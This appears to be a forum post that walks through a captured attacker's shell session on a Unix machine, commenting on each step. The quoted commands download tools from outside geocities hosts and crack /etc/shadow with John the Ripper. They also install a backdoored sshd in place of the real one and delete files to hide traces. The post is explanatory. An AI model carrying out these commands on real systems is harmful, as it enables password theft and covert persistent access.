**** forgot something:

I posted this because I thought it was very interesting and it showed a common way to hack a computer running a Unix OS.



w

The first command they ran was "w" which was probably to see who was online and if root was sitting at the console or not and OF COURSE check the uptime maybe to take a guess as to when the last reboot was. This helps find an exploit that the machine may not have installed. Though this tech works better on Windows where EVERY patch needs a reboot.


wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf

They used wget to grab a file on their own website which was a hacked version of a common application used by admin.


john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd
../run;./john /etc/shadow

They remove the downloaded file so the admin doesn't find.

wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
-rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h

Editing the header file.

cd ../..
./configure --without-x
make
make install

Installing the backdoored app.

mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd

Removing the actual applications to make room for their hacked copy.

cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart

A mild **** up

w

Check if anyone is going to notice a reboot

reboot

Pow.